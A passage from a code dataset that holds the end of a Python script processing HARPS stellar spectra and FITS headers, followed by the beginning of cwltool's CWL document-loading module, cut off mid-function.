normal_cutoff = float(cutoff) / nyq_freq\n b, a = signal.butter(order, normal_cutoff, btype='highpass')\n return b, a\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_highpass_filter(data, cutoff_freq, nyq_freq, order=4):\n b, a = butter_highpass(cutoff_freq, nyq_freq, order=order)\n y = signal.filtfilt(b, a, data)\n return y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef statistics(y):\n max_y = np.nanmax(y)\n min_y = np.nanmin(y)\n sum_y = np.nansum(y)\n mean_y = np.nanmean(y)\n median_y = np.nanmedian(y)\n rms_y = np.nanstd(y, ddof=1)\n skew_y = stats.skew(y / max(y), nan_policy='omit')\n kurt_y = stats.kurtosis(y / max(y), nan_policy='omit')\n return max_y, min_y, sum_y, mean_y, median_y, rms_y, skew_y, kurt_y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_spectrum(flux, wl, j1, j2):\n x = flux[0][j1:j2]\n wl_part = wl[0][j1:j2]\n max_value, min_value, sum_value, mean_value, median_value, rms_value, skew_value, kurt_value = statistics(x)\n coarse_resolution = 100.0 # Angstrom\n nnn = int(round((wl_part[-1] - wl_part[0]) / coarse_resolution))\n nwl = np.linspace(wl_part[0], wl_part[-1], nnn)\n spectrum_LR = np.zeros_like(nwl)\n for i in range(nnn):\n start_idx = np.searchsorted(wl_part, nwl[i] - coarse_resolution / 2)\n end_idx = np.searchsorted(wl_part, nwl[i] + coarse_resolution / 2)\n spectrum_LR[i] = np.sum(x[start_idx:end_idx]) / (end_idx - start_idx)\n f = interpolate.interp1d(nwl, spectrum_LR, kind='linear')\n spectrum_envelope = f(wl_part)\n spectrum_flat_0 = x / spectrum_envelope\n spec_median = np.nanmedian(spectrum_flat_0)\n spectrum_flat = spectrum_flat_0 / spec_median\n rms_f, min_f, sum_f, mean_f, median_f, rms_f, skew_f, kurt_f = statistics(spectrum_flat)\n return max_value, min_value, sum_value, mean_value, median_value, rms_value, skew_value, kurt_value, rms_f, min_f, sum_f, mean_f, median_f, rms_f, skew_f, kurt_f\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_file(file_list, file_type, datakw):\n spectral_masks = [\"G2\", \"K0\", \"K5\", \"M2\", \"M4\"]\n file_data = {}\n for keyword in datakw[file_type]['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n for mask in spectral_masks:\n file_data[f'{column_name}_{mask}_{file_type}'] = None\n filefits = next((f for f in file_list if f\"_{file_type}_\" in f), None)\n if filefits:\n isfits = testfilefits(filefits)\n if isfits == True:\n hdu=fits.open(filefits, ignore_missing_end=True)\n #print(f'{file_type} {filefits.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")}')\n hdr0 = hdu[0].header\n for keyword in datakw[file_type]['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n for mask in spectral_masks:\n if mask in filefits:\n try:\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n file_data[f'{column_name}_{mask}_{file_type}'] = {'value': keyword_value,'comment': keyword_comment}\n except KeyError:\n continue\n hdu.close()\n return file_data\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef process_gui_file(gui_files, datakw):\n gui_data = {}\n\n # Initialize gui_data dictionary\n for keyword in datakw['gui']['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n gui_data[column_name] = {'value': None, 'comment': None}\n\n # If gui_files is not empty\n if gui_files:\n gui_file = gui_files[0]\n isfits = testfilefits(gui_file)\n if isfits:\n # Open the file\n with fits.open(gui_file) as harps_list_obs:\n hdr0 = harps_list_obs[0].header\n # Loop through the keywords\n for keyword in datakw['gui']['keywords']:\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n try:\n # Try to access the keyword\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n gui_data[column_name] = {'value': keyword_value, 'comment': keyword_comment}\n except KeyError:\n # Keyword not found, skip to the next one\n print(f\"Keyword '{keyword}' not found, skipping.\")\n continue\n\n return gui_data\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n\n#********************************************************************************\n#\n# CONFIGURATION\n#\n#********************************************************************************\n\n\n# Location to store the downloaded files\nstorage_path = '/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data'\ncache_path = os.path.join(storage_path, '.cache')\nexec_path = '/home/mbarbier/mylocal/harpsrvcatalog/output'\n\n\n# Minimum and maximum usable wavelengths in the blue and red CCDs in Angstrom\nwl_min_b = 3783.0\nwl_max_b = 5304.0\nbw_b = wl_max_b - wl_min_b # 1521.0\nwl_min_r = 5338.0\nwl_max_r = 6912.0\nbw_r = wl_max_r - wl_min_r # 1574.0\n\nfile_names = ['adp', 'ccf', 'bis', 'gui']\nbase_filename = '{}_small.hdr'\nspectral_masks = [\"G2\", \"K0\", \"K5\", \"M2\", \"M4\"]\n\n\n#\nstellar_templates = pd.read_csv(\"list.phoenix_stellar_templates.csv\")\nw1 = 3781.05\nw2 = 6913.87\ntpl_wl = np.arange(w1, w2, 0.01)\nfor index, row in stellar_templates.iterrows():\n spt = row['spt']\n template_file = row['template_file']\n \n with fits.open(template_file) as harps_list_obs:\n spectpl = harps_list_obs[1].data\n tpl_wl_vacuum = spectpl.field('WAVE')\n tpl_wl_air = convert_to_air_wavelengths(tpl_wl_vacuum)\n flux = spectpl.field('FLUX')\n interpolated_flux = np.interp(tpl_wl, tpl_wl_air, flux)\n if 'M0' in spt:\n tpl_M = interpolated_flux\n if 'K2' in spt:\n tpl_K = interpolated_flux\n if 'G2' in spt:\n tpl_G = interpolated_flux\n if 'F5' in spt:\n tpl_F = interpolated_flux\n if 'A5' in spt:\n tpl_A = interpolated_flux\n if 'B8' in spt:\n tpl_B = interpolated_flux\ntemplates_spectra = [tpl_M, tpl_K, tpl_G, tpl_F, tpl_A, tpl_B]\n\n\n\n#\n\n#with fits.open('spectral_line_list_coluzzi_harps.fits') as absorption_lines:\n# absorption_lines_data = absorption_lines[1].data\n\nwith fits.open('nist_lines_output.fits') as absorption_lines:\n absorption_lines_data = absorption_lines[1].data\n \n\n\n# Dictionary to store keywords and comments for different file types\ndatakw = {}\n\n# Loop through each file type\nfor file_type in file_names:\n # Lists to store the keyword names and comments for the current file type\n keywords_list = []\n comments_list = []\n # Read the file line by line\n with open(base_filename.format(file_type), 'r') as f:\n for line in f:\n # Split the line based on '=' character\n keyword_part, value_comment_part = line.split('=', 1)\n # Strip whitespaces from keyword name and add to the list\n keywords_list.append(keyword_part.strip())\n # Split the second part based on '/' character to separate the value and comment\n value_part, comment_part = value_comment_part.split('/', 1)\n # Strip whitespaces from comment and add to the list\n comments_list.append(comment_part.strip())\n # Store the lists in the dictionary for the current file type\n datakw[file_type] = {'keywords': keywords_list, 'comments': comments_list}\n\n# Open the FITS file\nwith fits.open('harps_simbad_crossmatch_nearest.fits') as harps_list_obs:\n harps_list_obs_data = harps_list_obs[1].data\n indices = np.arange(len(harps_list_obs_data))\n # Shuffle the indices\n np.random.shuffle(indices)\n # Use the shuffled indices to access the rows in random order\n shuffled_harps_list_obs_data = harps_list_obs_data[indices]\n\n#print('begin masking')\n\n#mask_spt = [not row['spt_obj'].startswith(('O','B','A','F', 'G', 'K', 'M', 'N', '-')) for row in shuffled_harps_list_obs_data]\n#mask_spt = [row['spt_obj'].startswith(('C','W','Q','R', 'S', '?')) for row in shuffled_harps_list_obs_data]\n#mask_acen = [(row['ra']>219.84) & (row['ra']<219.9) & (row['dec']<-60.826) & (row['dec']>-60.844) for row in harps_list_obs_data]\n#mask_bethyi= [(row['ra']>6.34) & (row['ra']<6.48) & (row['dec']>-77.265) & (row['dec']<-77.245) for row in harps_list_obs_data]\n#mask_pole= [(row['dec']>-70) & (row['dec']<-90) for row in harps_list_obs_data]\n#mask=mask_acen\n#mask=mask_bethyi\n#mask=mask_pole\n\n## Apply the mask to select only the rows that meet the conditions\n#selected_rows = [row for row, m in zip(harps_list_obs_data, mask) if m]\n#selected_rows = [row for row, m in zip(shuffled_harps_list_obs_data, mask) if m]\n## Sort the selected_rows by 'mjd_obs' in descending order\n#selected_rows = sorted(selected_rows, key=lambda x: x['mjd_obs'], reverse=False)\n\n#print(len(selected_rows))\n#for row in selected_rows:\n# print(row['spt_obj'])\n \n#print('end masking')\n#sys.exit()\nk = 0\nspeck = None\n#speck_wl = None\n# Loop over all rows\n\n#for row in harps_list_obs_data:\n#\n#for row in selected_rows:\n#\nfor row in shuffled_harps_list_obs_data:\n k += 1\n #print()\n #if(k>1000):\n # sys.exit()\n dp_id_raw = row['dp_id_raw']\n archive_id_spectra0 = row['archive_id_spectra'].strip()\n archive_id_ancillary0 = row['archive_id_ancillary'].strip()\n\n if len(archive_id_spectra0) > 0:\n archive_id_spectra = archive_id_spectra0 + '.fits'\n dateobs = dp_id_raw[6:16]\n spectra_file = os.path.join(storage_path, dateobs, archive_id_spectra)\n all_results = {}\n #adp_data = {}\n #for keyword in datakw['adp']['keywords']:\n # column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n # adp_data[column_name] = {'value': None,'comment': None}\n #adp_data['tel_targ_delta_epoch'] = {'value': None,'comment': None}\n #adp_data['tel_targ_alpha_epoch'] = {'value': None,'comment': None}\n #adp_data['mjd-obs_center'] = {'value': None,'comment': None}\n #adp_data['diff_ra_ep_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_de_ep_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_ra_ob_pnt'] = {'value': None,'comment': None}\n #adp_data['diff_de_ob_pnt'] = {'value': None,'comment': None}\n #adp_data['num_pmra'] = {'value': None,'comment': None}\n #adp_data['num_pmde'] = {'value': None,'comment': None}\n isfits = testfilefits(spectra_file)\n if isfits == True:\n harps_list_obs = fits.open(spectra_file)\n #print(f'adp {spectra_file.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")}')\n hdr0 = harps_list_obs[0].header\n hdr1 = harps_list_obs[1].header\n spec = harps_list_obs[1].data\n adp_data = {}\n keywords = datakw['adp']['keywords']\n for keyword in keywords:\n keyword_value = hdr0.get(keyword, None)\n keyword_comment = hdr0.comments[keyword]\n column_name = keyword.replace('HIERARCH ESO ', '').replace(' ', '_').lower()\n adp_data[column_name] = {'value': keyword_value,'comment': keyword_comment}\n #print(adp_data[column_name])\n adp_data['tel_targ_delta_epoch'] = {'value': None,'comment': None}\n adp_data['tel_targ_alpha_epoch'] = {'value': None,'comment': None}\n adp_data['mjd-obs_center'] = {'value': None,'comment': None}\n adp_data['diff_ra_ep_pnt'] = {'value': None,'comment': None}\n adp_data['diff_de_ep_pnt'] = {'value': None,'comment': None}\n adp_data['diff_ra_ob_pnt'] = {'value': None,'comment': None}\n adp_data['diff_de_ob_pnt'] = {'value': None,'comment': None}\n adp_data['num_pmra'] = {'value': None,'comment': None}\n adp_data['num_pmde'] = {'value': None,'comment': None}\n \n #adp_data[''] = {'value': None,'comment': None}\n #print(adp_data['tel_targ_alpha']['value'],adp_data['tel_targ_delta']['value'])\n tel_targ_alpha_degrees, tel_targ_delta_degrees, tel_targ_alpha_sexag, tel_targ_delta_sexag = convert_from_pseudosexagesimal_to_degrees(adp_data['tel_targ_alpha']['value'],adp_data['tel_targ_delta']['value'])\n adp_data['tel_targ_alpha']['value'] = tel_targ_alpha_degrees\n adp_data['tel_targ_delta']['value'] = tel_targ_delta_degrees\n\n ra1 , de1, _ , _ = convert_from_pseudosexagesimal_to_degrees(adp_data['ins_adc1_ra']['value'],adp_data['ins_adc1_dec']['value'])\n adp_data['ins_adc1_ra']['value'] = ra1\n adp_data['ins_adc1_dec']['value'] = de1\n\n ra2 , de2, _ , _ = convert_from_pseudosexagesimal_to_degrees(adp_data['ins_adc2_ra']['value'],adp_data['ins_adc2_dec']['value'])\n adp_data['ins_adc2_ra']['value'] = ra2\n adp_data['ins_adc2_dec']['value'] = de2\n \n #j2000=51544.5\n pmra=adp_data['tel_targ_pma']['value']\n pmde=adp_data['tel_targ_pmd']['value']\n mjd=adp_data['mjd-obs']['value']\n tel_targ_alpha_epoch = tel_targ_alpha_degrees + pmra/3600*(mjd-51544.5)/365.25\n tel_targ_delta_epoch = tel_targ_delta_degrees + pmde/3600*(mjd-51544.5)/365.25\n adp_data['tel_targ_alpha_epoch']['value'] = tel_targ_alpha_epoch\n adp_data['tel_targ_delta_epoch']['value'] = tel_targ_delta_epoch\n pm_tot_ob = np.sqrt(pmra**2+pmde**2)\n adp_data['mjd-obs_center']['value']=mjd+adp_data['exptime']['value']*adp_data['ins_det1_tmmean']['value']\n diff_ra_ep_pnt = (adp_data['tel_targ_alpha_epoch']['value']-adp_data['ra']['value'])*3600*np.cos(adp_data['tel_targ_delta']['value']*np.pi/180)\n diff_de_ep_pnt = (adp_data['tel_targ_delta_epoch']['value']-adp_data['dec']['value'])*3600\n diff_ra_ob_pnt = (adp_data['tel_targ_alpha']['value']-adp_data['ra']['value'])*3600*np.cos(adp_data['tel_targ_delta']['value']*np.pi/180)\n diff_de_ob_pnt = (adp_data['tel_targ_delta']['value']-adp_data['dec']['value'])*3600\n #num_pmra = diff_ra_ep_pnt/(pmra*(mjd-51544.5)/365.25)\n #num_pmde = diff_de_ep_pnt/(pmde*(mjd-51544.5)/365.25)\n lon=adp_data['tel_geolon']['value']\n lat=adp_data['tel_geolat']['value']\n ele=adp_data['tel_geoelev']['value']\n humidity=adp_data['tel_ambi_rhum']['value']\n temperature=adp_data['tel_ambi_temp']['value']\n pressure=adp_data['tel_ambi_pres_start']['value']\n true_azimuth_angle = true_azimuth(adp_data['tel_az']['value'])\n adp_data['tel_az']['value'] = true_azimuth_angle\n\n sun_ra , sun_dec , sun_alt , sun_az = calculate_sun_position(mjd, lon, lat, ele)\n moon_ra, moon_dec, moon_alt, moon_az = calculate_moon_position(mjd, lon, lat, ele)\n sun_coord = SkyCoord(ra=sun_ra, dec=sun_dec, frame='icrs')\n moon_coord = SkyCoord(ra=moon_ra, dec=moon_dec, frame='icrs')\n object_coord = SkyCoord(ra=tel_targ_alpha_epoch*u.deg, dec=tel_targ_delta_epoch*u.deg, frame='icrs')\n \n angular_distance_obj_sun = object_coord.separation(sun_coord)\n angular_distance_obj_moon = object_coord.separation(moon_coord)\n \n #print(angular_distance_obj_sun.deg,angular_distance_obj_moon.deg,sun_alt.deg)\n\n azimuth, altitude, azimuth0, altitude0 = calculate_star_altaz(tel_targ_alpha_epoch, tel_targ_delta_epoch, lon, lat, ele, mjd, humidity, temperature, pressure)\n diff_az = (azimuth.deg-adp_data['tel_az']['value'])*3600*np.cos(altitude*np.pi/180)\n diff_alt = (altitude.deg-adp_data['tel_alt']['value'])*3600\n\n\n all_results.update(adp_data)\n wl = spec.field('WAVE')\n flux = spec.field('FLUX')\n wl_ = spec.field('WAVE').flatten()\n flux_ = spec.field('FLUX').flatten()\n npoints = flux.size\n \n #print(adp_data['object']['value'])\n # Tecnezio\n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4238.19,3.0)\n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4262.27,3.0)\n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4297.00,3.0)\n \n print()\n print(row['object'],row['spt_obj'])\n #rv,reduced_chisq,gamma,skewness,kurtosis = fit_absorption_line2(wl_, flux_,6562.817,30.0)\n \n rv,reduced_chisq,gamma,skewness,kurtosis,speck1,speck_wl = fit_absorption_line(wl_, flux_,6562.817,20.0, False)\n \n if k==1:\n speck = np.zeros_like(speck1)\n\n print(k)\n speck=((k-1)*speck+speck1)/k\n \n if np.mod(k,100)==0:\n fig, ax1 = plt.subplots(1, 1)\n ax1.plot(speck)\n plt.show()\n \n\n \n #new_wl = wl_*(1+rv/const.c.to(u.km/u.s).value)\n #flux_interpolator = interp1d(wl_, flux_, kind='cubic', bounds_error=False, fill_value=0)\n #new_flux = flux_interpolator(new_wl)\n #_,_,_,_,_ = fit_absorption_line(new_wl, new_flux,6562.817,10.0, True)\n\n \n #popt,deltawl,rvha = fit_absorption_line(wl_, flux_,4861.332,10.0)\n #continuum,intensity,centrawl,width1sig = popt\n #print(row['object'],\",\",row['mjd_obs'],\",\",rv,\",\",reduced_chisq,\",\",gamma,\",\",skewness,\",\",kurtosis)\n\n \n\n stat_spec_b = {\n 'max_b': None, 'min_b': None, 'sum_b': None, 'mean_b': None, 'median_b': None, 'rms_b': None,\n 'skew_b': None, 'kurt_b': None, 'max_bf': None, 'min_bf': None, 'sum_bf': None, 'mean_bf': None,\n 'median_bf': None, 'rms_bf': None, 'skew_bf': None, 'kurt_bf': None\n }\n stat_spec_r = {\n 'max_r': None, 'min_r': None, 'sum_r': None, 'mean_r': None, 'median_r': None, 'rms_r': None,\n 'skew_r': None, 'kurt_r': None, 'max_rf': None, 'min_rf': None, 'sum_rf': None, 'mean_rf': None,\n 'median_rf': None, 'rms_rf': None, 'skew_rf': None, 'kurt_rf': None\n }\n \n if npoints > 150000:\n j_values = [0, 0, 0, 0]\n ranges = [(0, 300), (152100, 152400), (155400, 155700), (npoints - 300, npoints - 1)]\n conditions = [(wl_min_b, 'b'), (wl_max_b, 'b'), (wl_min_r, 'r'), (wl_max_r, 'r')]\n for index, ((start, end), (wl_limit, band)) in enumerate(zip(ranges, conditions)):\n for j in range(start, end):\n wl_prev = wl[0][j - 1]\n wl_curr = wl[0][j]\n if wl_prev < wl_limit <= wl_curr:\n j_values[index] = j\n break\n j1, j2, j3, j4 = j_values\n \n if j1 > 0 and j2 > j1:\n max_b, min_b, sum_b, mean_b, median_b, rms_b, skew_b, kurt_b, rms_bf, min_bf, sum_bf, mean_bf, median_bf, rms_bf, skew_bf, kurt_bf = process_spectrum(flux, wl, j1, j2)\n stat_spec_b = {'max_b': max_b, 'min_b': min_b, 'sum_b': sum_b, 'mean_b': mean_b, 'median_b': median_b, 'rms_b': rms_b,'skew_b': skew_b, 'kurt_b': kurt_b, \n 'max_bf': rms_bf, 'min_bf': min_bf, 'sum_bf': sum_bf, 'mean_bf': mean_bf, 'median_bf': median_bf, 'rms_bf': rms_bf, 'skew_bf': skew_bf, 'kurt_bf': kurt_bf}\n\n if j3 > j2 and j3 < j4:\n max_r, min_r, sum_r, mean_r, median_r, rms_r, skew_r, kurt_r, rms_rf, min_rf, sum_rf, mean_rf, median_rf, rms_rf, skew_rf, kurt_rf = process_spectrum(flux, wl, j3, j4)\n stat_spec_r = {'max_r': max_r, 'min_r': min_r, 'sum_r': sum_r, 'mean_r': mean_r, 'median_r': median_r, 'rms_r': rms_r,'skew_r': skew_r, 'kurt_r': kurt_r, \n 'max_rf': rms_rf, 'min_rf': min_rf, 'sum_rf': sum_rf,'mean_rf': mean_rf, 'median_rf': median_rf, 'rms_rf': rms_rf, 'skew_rf': skew_rf, 'kurt_rf': kurt_rf}\n \n all_results.update(stat_spec_b)\n all_results.update(stat_spec_r)\n harps_list_obs.close()\n\n\n######\n######\n######\n######\n######\n\n # Create patterns to search for \"bis\" and \"ccf\" files\n # Check if the length of archive_id_ancillary is greater than 0 and if there is at least one \"bis\" or one \"ccf\" file\n # Process CCF file of this type\n ccf_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_ccf*_A.fits\")\n ccf_files = glob.glob(ccf_pattern)\n ccf_data = process_file(ccf_files, 'ccf', datakw)\n all_results.update(ccf_data)\n\n # Process BIS file of this type\n bis_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_bis*_A.fits\")\n bis_files = glob.glob(bis_pattern)\n bis_data = process_file(bis_files, 'bis', datakw)\n all_results.update(bis_data)\n\n # Process GUIDE file\n gui_pattern = os.path.join(storage_path, dateobs, dp_id_raw + \"_INT_GUIDE.fits\")\n gui_files = glob.glob(gui_pattern)\n gui_data = process_gui_file(gui_files, datakw)\n all_results.update(gui_data)\n \n \n #print(all_results)\n #print(k)\n\n\n\n\n\n\n\n\n\n\nsys.exit()\n#--------------- END PROGRAM\n\n\n\n\n\n\n\n\n\n\n\n\n\n#radvel = False\n#if radvel == True:\n #em1=np.min(wl) \n #em2=np.max(wl)\n #ix1=np.argmin(np.abs(tpl_wl-em1))\n #ix2=np.argmin(np.abs(tpl_wl-em2))\n #tpl_wl_cut=tpl_wl[ix1:ix2+1]\n\n #results = []\n #max_velocity = +1000 # km/s\n #min_velocity = -1000 # km/s\n #deltalamba_over_lambda = 0.01 / 5500.0\n #vel_c = const.c.to(u.km/u.s).value\n #kost = (deltalamba_over_lambda * vel_c)\n ##print(80/kost)\n ##sys.exit()\n #kk=0\n #for flux_template in templates_spectra:\n #tpl_flux_cut = flux_template[ix1:ix2+1]\n #kk += 1\n #if kk >1:\n #break\n ## Calculate the maximum allowed lag for the desired velocity range\n #max_lag = int(max_velocity / kost )\n #min_lag = int(min_velocity / kost )\n ##print(min_lag,max_lag)\n \n ## Limit the range of lags\n #lag = np.arange(min_lag, max_lag + 1)\n #velocities = lag * kost\n #lag = np.arange(-npoints + 1, npoints)\n\n #correlation = correlate(flux_ - np.mean(flux_), tpl_flux_cut - np.mean(tpl_flux_cut), mode='full')\n ## Since the correlation is calculated for a larger range of lags than needed,\n ## slice the correlation array to match the range of lags of interest.\n #start_index = npoints + min_lag\n #end_index = npoints + max_lag + 1\n #correlation = correlation[start_index:end_index]\n \n #radial_velocity = velocities[np.argmax(correlation)]\n #peaks, _ = find_peaks(correlation)\n #results_half = peak_widths(correlation, peaks, rel_height=0.5)\n #fwhm = results_half[0]\n ##print(fwhm)\n #results.extend([radial_velocity, fwhm[0]])\n #rvu=adp_data['tel_targ_radvel']['value']\n #rv_obs=radial_velocity-adp_data['drs_berv']['value']\n #berv=adp_data['drs_berv']['value']\n #rv=rv_obs+berv\n #print(adp_data['date-obs']['value'])\n #print('RVuser = ',rvu)\n #print('RV = ',rv)\n #print('RVu-BERV-RV = ',rvu-rv)\n \n #figures = True\n #if figures == True:\n #plt.figure(figsize=(12, 6))\n #plt.subplot(2, 1, 1)\n #plt.plot(wl_, flux_/np.mean(flux_), label='flux')\n #plt.plot(tpl_wl_cut, tpl_flux_cut/np.mean(tpl_flux_cut)+2, label='tpl_flux_cut')\n #plt.xlabel('Wavelength')\n #plt.ylabel('Flux')\n #plt.legend()\n \n #plt.subplot(2, 1, 2)\n #plt.plot(velocities, correlation, label='correlation')\n #plt.xlabel('Velocity (km/s)')\n #plt.ylabel('Correlation')\n #plt.legend()\n \n #plt.show()\n","repo_name":"barbierimauro/AstronomerHelper","sub_path":"HARPS/check_files_ccfbis.py","file_name":"check_files_ccfbis.py","file_ext":"py","file_size_in_byte":53758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13554879628","text":"\"\"\"Loads a CWL document.\"\"\"\n\nimport copy\nimport hashlib\nimport logging\nimport os\nimport re\nimport urllib\nimport uuid\nfrom functools import partial\nfrom typing import (\n Any,\n Dict,\n List,\n MutableMapping,\n MutableSequence,\n Optional,\n Tuple,\n Union,\n cast,\n)\n\nfrom cwl_utils.parser import cwl_v1_2, cwl_v1_2_utils\nfrom ruamel.yaml.comments import CommentedMap, CommentedSeq\nfrom schema_salad.exceptions import ValidationException\nfrom schema_salad.fetcher import Fetcher\nfrom schema_salad.ref_resolver import Loader, file_uri\nfrom schema_salad.schema import validate_doc\nfrom schema_salad.sourceline import SourceLine, cmap\nfrom schema_salad.utils import (\n ContextType,\n FetcherCallableType,\n IdxResultType,\n ResolveType,\n json_dumps,\n)\n\nfrom . import CWL_CONTENT_TYPES, process, update\nfrom .context import LoadingContext\nfrom .errors import GraphTargetMissingException\nfrom .loghandler import _logger\nfrom .process import Process, get_schema, shortname\nfrom .update import ALLUPDATES\nfrom .utils import CWLObjectType, ResolverType, visit_class\n\ndocloaderctx: ContextType = {\n \"cwl\": \"https://w3id.org/cwl/cwl#\",\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"path\": {\"@type\": \"@id\"},\n \"location\": {\"@type\": \"@id\"},\n \"id\": \"@id\",\n}\n\njobloader_id_name = \"__id\"\njobloaderctx: ContextType = {\n \"cwl\": \"https://w3id.org/cwl/cwl#\",\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"path\": {\"@type\": \"@id\"},\n \"location\": {\"@type\": \"@id\"},\n jobloader_id_name: \"@id\",\n}\n\n\noverrides_ctx: ContextType = {\n \"overrideTarget\": {\"@type\": \"@id\"},\n \"cwltool\": \"http://commonwl.org/cwltool#\",\n \"http://commonwl.org/cwltool#overrides\": {\n \"@id\": \"cwltool:overrides\",\n \"mapSubject\": \"overrideTarget\",\n },\n \"requirements\": {\n \"@id\": \"https://w3id.org/cwl/cwl#requirements\",\n \"mapSubject\": \"class\",\n },\n}\n\n\ndef default_loader(\n fetcher_constructor: Optional[FetcherCallableType] = None,\n enable_dev: bool = False,\n doc_cache: bool = True,\n) -> Loader:\n return Loader(\n docloaderctx,\n fetcher_constructor=fetcher_constructor,\n allow_attachments=lambda r: enable_dev,\n doc_cache=doc_cache,\n )\n\n\ndef resolve_tool_uri(\n argsworkflow: str,\n resolver: Optional[ResolverType] = None,\n fetcher_constructor: Optional[FetcherCallableType] = None,\n document_loader: Optional[Loader] = None,\n) -> Tuple[str, str]:\n uri = None # type: Optional[str]\n split = urllib.parse.urlsplit(argsworkflow)\n # In case of Windows path, urlsplit misjudge Drive letters as scheme, here we are skipping that\n if split.scheme and split.scheme in [\"http\", \"https\", \"file\"]:\n uri = argsworkflow\n elif os.path.exists(os.path.abspath(argsworkflow)):\n uri = file_uri(str(os.path.abspath(argsworkflow)))\n elif resolver is not None:\n uri = resolver(document_loader or default_loader(fetcher_constructor), argsworkflow)\n\n if uri is None:\n raise ValidationException(\"Not found: '%s'\" % argsworkflow)\n\n if argsworkflow != uri:\n _logger.info(\"Resolved '%s' to '%s'\", argsworkflow, uri)\n\n fileuri = urllib.parse.urldefrag(uri)[0]\n return uri, fileuri\n\n\ndef fetch_document(\n argsworkflow: Union[str, CWLObjectType],\n loadingContext: Optional[LoadingContext] = None,\n) -> Tuple[LoadingContext, CommentedMap, str]:\n \"\"\"Retrieve a CWL document.\"\"\"\n if loadingContext is None:\n loadingContext = LoadingContext()\n loadingContext.loader = default_loader()\n else:\n loadingContext = loadingContext.copy()\n if loadingContext.loader is None:\n loadingContext.loader = default_loader(\n loadingContext.fetcher_constructor,\n enable_dev=loadingContext.enable_dev,\n doc_cache=loadingContext.doc_cache,\n )\n\n if isinstance(argsworkflow, str):\n uri, fileuri = resolve_tool_uri(\n argsworkflow,\n resolver=loadingContext.resolver,\n document_loader=loadingContext.loader,\n )\n workflowobj = cast(\n CommentedMap,\n loadingContext.loader.fetch(fileuri, content_types=CWL_CONTENT_TYPES),\n )\n return loadingContext, workflowobj, uri\n if isinstance(argsworkflow, MutableMapping):\n uri = cast(str, argsworkflow[\"id\"]) if argsworkflow.get(\"id\") else \"_:\" + str(uuid.uuid4())\n workflowobj = cast(CommentedMap, cmap(cast(Dict[str, Any], argsworkflow), fn=uri))\n loadingContext.loader.idx[uri] = workflowobj\n return loadingContext, workflowobj, uri\n raise ValidationException(\"Must be URI or object: '%s'\" % argsworkflow)\n\n\ndef _convert_stdstreams_to_files(\n workflowobj: Union[CWLObjectType, MutableSequence[Union[CWLObjectType, str, int]], str]\n) -> None:\n if isinstance(workflowobj, MutableMapping):\n if workflowobj.get(\"class\") == \"CommandLineTool\":\n with SourceLine(\n workflowobj,\n \"outputs\",\n ValidationException,\n _logger.isEnabledFor(logging.DEBUG),\n ):\n outputs = workflowobj.get(\"outputs\", [])\n if not isinstance(outputs, CommentedSeq):\n raise ValidationException('\"outputs\" section is not ' \"valid.\")\n for out in cast(MutableSequence[CWLObjectType], workflowobj.get(\"outputs\", [])):\n if not isinstance(out, CommentedMap):\n raise ValidationException(f\"Output {out!r} is not a valid OutputParameter.\")\n for streamtype in [\"stdout\", \"stderr\"]:\n if out.get(\"type\") == streamtype:\n if \"outputBinding\" in out:\n raise ValidationException(\n \"Not allowed to specify outputBinding when\"\n \" using %s shortcut.\" % streamtype\n )\n if streamtype in workflowobj:\n filename = workflowobj[streamtype]\n else:\n filename = str(\n hashlib.sha1( # nosec\n json_dumps(workflowobj, sort_keys=True).encode(\"utf-8\")\n ).hexdigest()\n )\n workflowobj[streamtype] = filename\n out[\"type\"] = \"File\"\n out[\"outputBinding\"] = cmap({\"glob\": filename})\n for inp in cast(MutableSequence[CWLObjectType], workflowobj.get(\"inputs\", [])):\n if inp.get(\"type\") == \"stdin\":\n if \"inputBinding\" in inp:\n raise ValidationException(\n \"Not allowed to specify inputBinding when\" \" using stdin shortcut.\"\n )\n if \"stdin\" in workflowobj:\n raise ValidationException(\n \"Not allowed to specify stdin path when\" \" using stdin type shortcut.\"\n )\n else:\n workflowobj[\"stdin\"] = (\n \"$(inputs.%s.path)\"\n % cast(str, inp[\"id\"]).rpartition(\"#\")[2].split(\"/\")[-1]\n )\n inp[\"type\"] = \"File\"\n else:\n for entry in workflowobj.values():\n _convert_stdstreams_to_files(\n cast(\n Union[\n CWLObjectType,\n MutableSequence[Union[CWLObjectType, str, int]],\n str,\n ],\n entry,\n )\n )\n if isinstance(workflowobj, MutableSequence):\n for entry in workflowobj:\n _convert_stdstreams_to_files(\n cast(\n Union[\n 